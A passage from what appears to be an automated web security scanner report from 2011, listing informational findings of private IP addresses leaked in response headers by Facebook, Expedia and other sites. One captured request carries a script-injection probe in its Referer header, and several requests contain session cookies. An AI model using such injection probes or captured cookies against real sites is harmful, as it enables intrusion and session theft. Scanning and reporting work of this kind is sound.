Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.234.58
X-Cnection: close
Content-Length: 2061
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:39 GMT
Date: Mon, 13 Jun 2011 11:18:39 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.8. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.222.31

Request

GET /safe_image.php?d=6b7c19f9bb2c38d150e093452b493685&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2F66%2F2c2%2Fd662c29d-2166-52f7-b67b-06d616030dc1-revisions%2F4ddb0476cd0aa.preview-100.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.222.31
X-Cnection: close
Content-Length: 2829
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 14 Jun 2011 11:21:13 GMT
Date: Mon, 13 Jun 2011 11:21:13 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.9. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.99.35

Request

GET /safe_image.php?d=cb7b075ca222b6890d0d629f93ba23dc&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F7%2F6%2F198675%2Fcuts%2Fseven-of-nine_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.52.99.35
X-Cnection: close
Content-Length: 1977
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:39 GMT
Date: Mon, 13 Jun 2011 11:18:39 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.10. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.52.51

Request

GET /safe_image.php?d=a524f60b34674c93df801e7a07851813&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F8%2F9%2F6%2F198698%2Fcuts%2Fray_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.52.51
X-Cnection: close
Content-Length: 2025
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:39 GMT
Date: Mon, 13 Jun 2011 11:18:39 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.11. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.233.31

Request

GET /safe_image.php?d=2a6467d28941d69750c4f7ad49d2ebae&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F0%2F7%2F4%2F198470%2Fcuts%2Fmc-dallastexas02-web_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.233.31
X-Cnection: close
Content-Length: 2219
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:38 GMT
Date: Mon, 13 Jun 2011 11:18:38 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.12. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.10.25

Request

GET /safe_image.php?d=d7249f9ff0368746a0464a20d39b177f&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F5%2F4%2F0%2F197045%2Fcuts%2Fclockwork-3_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.10.25
X-Cnection: close
Content-Length: 1502
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:39 GMT
Date: Mon, 13 Jun 2011 11:18:39 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.13. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.63.41

Request

GET /safe_image.php?d=8a4bb03f65de0309ac8ea256f0cd6c8b&url=http%3A%2F%2Fmimg.ugo.com%2F201106%2F3%2F7%2F6%2F198673%2Fcuts%2Fbatwing-cvr1_72x72.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.53.63.41
X-Cnection: close
Content-Length: 2517
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Mon, 13 Jun 2011 23:18:38 GMT
Date: Mon, 13 Jun 2011 11:18:38 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.14. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.22.36

Request

GET /safe_image.php?d=51b79943983c4c512eb35e984e633298&url=http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fthesouthern_logo.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.22.36
X-Cnection: close
Content-Length: 2281
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Mon, 13 Jun 2011 11:23:13 GMT
Date: Mon, 13 Jun 2011 11:13:13 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

22.15. http://graph.facebook.com/1599594030/picture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/1599594030/picture

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.9.125

Request

GET /1599594030/picture HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/187019_1599594030_8323142_q.jpg
Pragma: no-cache
X-FB-Rev: 390928
X-FB-Server: 10.28.9.125
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:04 GMT
Content-Length: 0

22.16. http://graph.facebook.com/680122358/picture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/680122358/picture

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.8.114

Request

GET /680122358/picture HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/195332_680122358_4683474_q.jpg
Pragma: no-cache
X-FB-Rev: 390928
X-FB-Server: 10.28.8.114
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:04 GMT
Content-Length: 0

22.17. http://graph.facebook.com/695375004/picture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/695375004/picture

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.7.110

Request

GET /695375004/picture HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/203035_695375004_4006758_q.jpg
Pragma: no-cache
X-FB-Rev: 390928
X-FB-Server: 10.28.7.110
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:04 GMT
Content-Length: 0

22.18. http://graph.facebook.com/701741542/picture previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/701741542/picture

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.1.121

Request

GET /701741542/picture HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://profile.ak.fbcdn.net/hprofile-ak-snc4/49788_701741542_9679_q.jpg
Pragma: no-cache
X-FB-Rev: 390928
X-FB-Server: 10.28.1.121
X-Cnection: close
Date: Mon, 13 Jun 2011 11:18:04 GMT
Content-Length: 0

22.19. http://justjared.buzznet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://justjared.buzznet.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.21.47

Request

GET /favicon.ico HTTP/1.1
Host: justjared.buzznet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:34:49 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=justjared.buzznet.com
Last-Modified: Fri, 16 Jan 2009 19:45:49 GMT
Accept-Ranges: bytes
Content-Length: 894
X-RSID: 192.168.21.47
Cache-Control: max-age=86400, must-revalidate
Connection: close
Content-Type: image/x-icon

..............h.......(....... ................L...L..........................................................................l`.%!....

.0+.~p.........................................................
...[SNIP]...

22.20. http://justjared.buzznet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://justjared.buzznet.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.21.43

Request

GET /favicon.ico HTTP/1.1
Host: justjared.buzznet.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:01 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=justjared.buzznet.com
Last-Modified: Fri, 16 Jan 2009 19:45:49 GMT
Accept-Ranges: bytes
Content-Length: 894
X-RSID: 192.168.21.43
Cache-Control: max-age=86400, must-revalidate
Connection: close
Content-Type: image/x-icon

..............h.......(....... ................L...L..........................................................................l`.%!....

.0+.~p.........................................................
...[SNIP]...

22.21. http://media.expedia.com/ads/travelhook/travelhook.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.expedia.com
Path:	/ads/travelhook/travelhook.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.95.13.23
10.96.73.221

Request

GET /ads/travelhook/travelhook.js HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
ntCoent-Length: 27105
Content-Type: application/x-javascript
Last-Modified: Fri, 04 Mar 2011 19:46:42 GMT
Accept-Ranges: bytes
ETag: "03d84e2a4dacb1:0"
Server: Microsoft-IIS/6.0
Content-Length: 27105
Vary: Accept-Encoding
Cache-Control: max-age=900
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

try
{

var th_StaticStart = new Date();
var thsver = '6.58';
var thsrn = Math.floor(Math.random() * 1000000);
var th_domain = 'extras.expedia.com';

function getEndvrTUID()
{

...[SNIP]...
   Pages["HTX_LOGIN"] = th_domain + "/Offers/js/LoginScrape.js?thsads=false";

}

       // Sams Club
if (document.URL.indexOf("travel.samsclub.com") >= 0 ||
document.URL.indexOf("10.95.13.23") >
...[SNIP]...
&pn=Confirmation";
       Pages["HTX_ITNHEAD_STD"] = th_domain + "/Delivery/scrape.aspx?cid=1&pn=TripItinerary";
    }
    else if (document.URL.indexOf("aarp") >= 0 ||
    document.URL.indexOf("10.96.73.221") >
...[SNIP]...

22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.ak.fbcdn.net
Path:	/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif HTTP/1.1
Host: profile.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Wed, 02 Mar 2011 04:15:18 GMT
X-FB-Server: 10.138.64.185
Cache-Control: public, max-age=1209600
Expires: Mon, 27 Jun 2011 11:33:09 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close
Content-Length: 390

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g. ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...

22.23. http://static.ak.connect.facebook.com/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.149.125

Request

GET /connect.php HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://api.connect.facebook.com/static/v0.4/client_restserver.php?r=1307382546
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "6dddf78dae66d230b9412799cde35fa5"
X-FB-Server: 10.32.149.125
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=971
Expires: Mon, 13 Jun 2011 11:50:07 GMT
Date: Mon, 13 Jun 2011 11:33:56 GMT
Connection: close

/*1307494197,169907581,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.24. http://static.ak.connect.facebook.com/connect.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.170.102

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "6dddf78dae66d230b9412799cde35fa5"
X-FB-Server: 10.32.170.102
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=800
Expires: Mon, 13 Jun 2011 11:47:16 GMT
Date: Mon, 13 Jun 2011 11:33:56 GMT
Connection: close

/*1307493552,169912934,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.25. http://static.ak.connect.facebook.com/connect.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.186.102

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP
If-None-Match: "addc56fa32b850cc30f3a39f08148f99"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "6dddf78dae66d230b9412799cde35fa5"
X-FB-Server: 10.27.186.102
X-Cnection: close
Content-Length: 18453
Cache-Control: public, max-age=888
Expires: Mon, 13 Jun 2011 11:33:40 GMT
Date: Mon, 13 Jun 2011 11:18:52 GMT
Connection: close
Vary: Accept-Encoding

/*1307493171,169589350,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.26. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.6.104

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
